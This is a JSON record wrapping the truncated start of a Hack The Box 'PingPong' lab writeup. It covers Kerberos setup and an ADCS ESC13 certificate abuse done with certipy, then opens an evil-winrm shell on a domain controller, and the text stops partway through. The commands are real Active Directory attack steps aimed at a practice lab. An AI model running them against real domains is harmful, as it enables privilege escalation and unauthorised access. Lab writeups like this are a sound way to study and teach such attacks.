{
  "$type": "site.standard.document",
  "bskyPostRef": {
    "cid": "bafyreif3ny63pau4ydwqyak5xrrai5swdzf4ah7ebqvf2iq5i3eaikgs7i",
    "uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3mkht636y7h72"
  },
  "coverImage": {
    "$type": "blob",
    "ref": {
      "$link": "bafkreienfxjuh3wm6konrh64i4k2vhouiv6mk2layqgvowpvxp6mk3r7ma"
    },
    "mimeType": "image/jpeg",
    "size": 47595
  },
  "description": "BOX OVERVIEW\n\nDifficulty: Hard | OS: Windows | Type: Active Directory (Multi-Forest)\n\nPingPong is a hard Active Directory machine featuring two forests bridged by a bidirectional trust:\n\n * PING.HTB — DC1: dc1.ping.htb — external entry point (IP changes per reset)\n * PONG.HTB — DC2: dc2.pong.htb — internal-only, reachable via DC1\n\nNTLM is disabled on both domains — every authentication is Kerberos. The host clock has a significant skew from real UTC, requiring a clock workaround on every Kerb...",
  "path": "/hack-the-box-season-10-htb-pingpong-writeup-insane-weekly-april-25th-2026/",
  "publishedAt": "2026-04-25T06:00:00.000Z",
  "site": "https://1337sheets.com",
  "tags": [
  ],
  "textContent": "## Box Overview\n\n**Difficulty** : Hard | **OS** : Windows | **Type** : Active Directory (Multi-Forest)\n\nPingPong is a hard Active Directory machine featuring two forests bridged by a bidirectional trust:\n\n  * **PING.HTB** — DC1: `dc1.ping.htb` — external entry point (IP changes per reset)\n  * **PONG.HTB** — DC2: `dc2.pong.htb` — internal-only, reachable via DC1\n\n\n\nNTLM is **disabled on both domains** — every authentication is Kerberos. The host clock has a significant skew from real UTC, requiring a clock workaround on every Kerberos operation. RC4 is also disabled on PONG.HTB, mandating AES256 keys.\n\n**Targets** :\n\n  * User flag: `C:\\Users\\C.Carlssen\\Desktop\\user.txt` on DC2\n  * Root flag: `C:\\Users\\Administrator\\Desktop\\root.txt` on DC1\n\n\n\n* * *\n\n## Pre-Engagement Setup\n\n### Variables\n\n\n    DC1_IP=<DC1_IP>            # Changes per reset\n    ATTACKER_IP=<ATTACKER_IP>  # Your VPN IP — verify with `ip addr show tun0`\n    DC2_IP=<DC2_INTERNAL_IP>   # Fixed internal IP for DC2\n\n\n### /etc/hosts\n\n\n    sudo sed -i \"/ping\\.htb/d;/pong\\.htb/d\" /etc/hosts\n    echo \"<DC1_IP>  dc1.ping.htb ping.htb\" | sudo tee -a /etc/hosts\n    echo \"<DC2_INTERNAL_IP>  dc2.pong.htb pong.htb\" | sudo tee -a /etc/hosts\n\n\n### /etc/krb5.conf\n\n\n    [libdefaults]\n        default_realm = PING.HTB\n        dns_lookup_realm = false\n        dns_lookup_kdc = false\n        kdc_timesync = 1\n        forwardable = true\n\n    [realms]\n        PING.HTB = {\n            kdc = dc1.ping.htb\n            admin_server = dc1.ping.htb\n        }\n        PONG.HTB = {\n            kdc = dc2.pong.htb\n            admin_server = dc2.pong.htb\n        }\n\n    [domain_realm]\n        .ping.htb = PING.HTB\n        ping.htb = PING.HTB\n        .pong.htb = PONG.HTB\n        pong.htb = PONG.HTB\n\n\n### Tmux Session\n\nCreate a clean tmux session for managing all interactive windows:\n\n\n    tmux new-session -d -s pp -n work\n\n\nWindows 
we'll create:\n\n  * `dc1` — evil-winrm shell on DC1 as c.roberts\n  * `ligolo` — ligolo-proxy server\n  * `mssql` — impacket-mssqlclient as C.Adam\n  * `root` — evil-winrm as Administrator (final step)\n\n\n\n### Verify VPN IP\n\n**Critical** : Always verify your VPN IP before starting — it can change between sessions and the ligolo agent must connect back to the correct address:\n\n\n    ip addr show tun0 | grep inet\n\n\n### Clock Skew Workaround\n\nThe DCs run on a clock that is significantly ahead of UTC. Wrap **every** Kerberos-related command with `faketime '+<Hour> hours'` to compensate. The exact offset can be discovered from the Kerberos error response or `nmap`'s clock-skew script.\n\n* * *\n\n## STEP 1 — Initial Access: ADCS ESC13 → WinRM on DC1\n\n**Entry credentials** (assumed breach scenario): `c.roberts / <REDACTED>` @ `ping.htb`\n\n### 1.1. Get Initial TGT\n\n\n    faketime '+<Hour> hours' impacket-getTGT 'ping.htb/c.roberts:<REDACTED>' -dc-ip <DC1_IP>\n\n\n**Output** :\n\n\n    [*] Saving ticket in c.roberts.ccache\n\n\n### 1.2. Enumerate ADCS\n\n\n    KRB5CCNAME=c.roberts.ccache faketime '+<Hour> hours' certipy-ad find \\\n      -u c.roberts@ping.htb -k -no-pass \\\n      -dc-ip <DC1_IP> -target dc1.ping.htb -stdout\n\n\nKey findings:\n\n  * **CA** : `ping-DC1-CA` on `dc1.ping.htb`\n  * **TemporaryWinRM** template (ESC13): enrollable by Domain Users, Client Authentication EKU, issuance policy linked to `TempWinRMAccess` group\n  * **SmartcardAuthentication** template: target for later ESC4\n\n\n\n### 1.3. 
Request TemporaryWinRM Certificate (ESC13)\n\nESC13: when a certificate template's issuance policy maps to a security group, enrolling the certificate transfers that group membership to the holder via the PAC's issuance policy SID extension.\n\n\n    KRB5CCNAME=c.roberts.ccache faketime '+<Hour> hours' certipy-ad req \\\n      -u c.roberts@ping.htb -k -no-pass \\\n      -target dc1.ping.htb -dc-host dc1.ping.htb \\\n      -ca ping-DC1-CA -template TemporaryWinRM\n\n\n**Output** :\n\n\n    [*] Requesting certificate via RPC\n    [*] Successfully requested certificate\n    [*] Got certificate with UPN 'C.Roberts@ping.htb'\n    [*] Certificate object SID is '<C_ROBERTS_SID>'\n    [*] Saving certificate and private key to 'c.roberts.pfx'\n\n\n**c.roberts SID captured** — needed for the cross-forest DACL abuse later.\n\n### 1.4. PKINIT Authentication\n\nThe PKINIT TGT is special: it includes the issuance policy SID mapping that grants `TempWinRMAccess` membership. A password-based TGT does NOT include this. Use the PKINIT ccache for WinRM operations.\n\n\n    rm -f c.roberts.ccache  # Avoid the overwrite prompt\n    faketime '+<Hour> hours' certipy-ad auth -pfx c.roberts.pfx -dc-ip <DC1_IP>\n\n\n**Output** :\n\n\n    [*] Got TGT\n    [*] Saving credential cache to 'c.roberts.ccache'\n    [*] Got hash for 'c.roberts@ping.htb': <REDACTED>\n\n\n### 1.5. WinRM Shell on DC1\n\nOpen in tmux for persistence:\n\n\n    tmux new-window -t pp -n dc1\n    tmux send-keys -t pp:dc1 \"KRB5CCNAME=c.roberts.ccache faketime '+<Hour> hours' evil-winrm -i dc1.ping.htb -u c.roberts -r PING.HTB\" Enter\n\n\n**Verify access** :",
  "title": "Hack The Box - Season 10 HTB PingPong Writeup - INSANE - Weekly - April 25th, 2026",
  "updatedAt": "2026-04-27T10:07:18.558Z"
}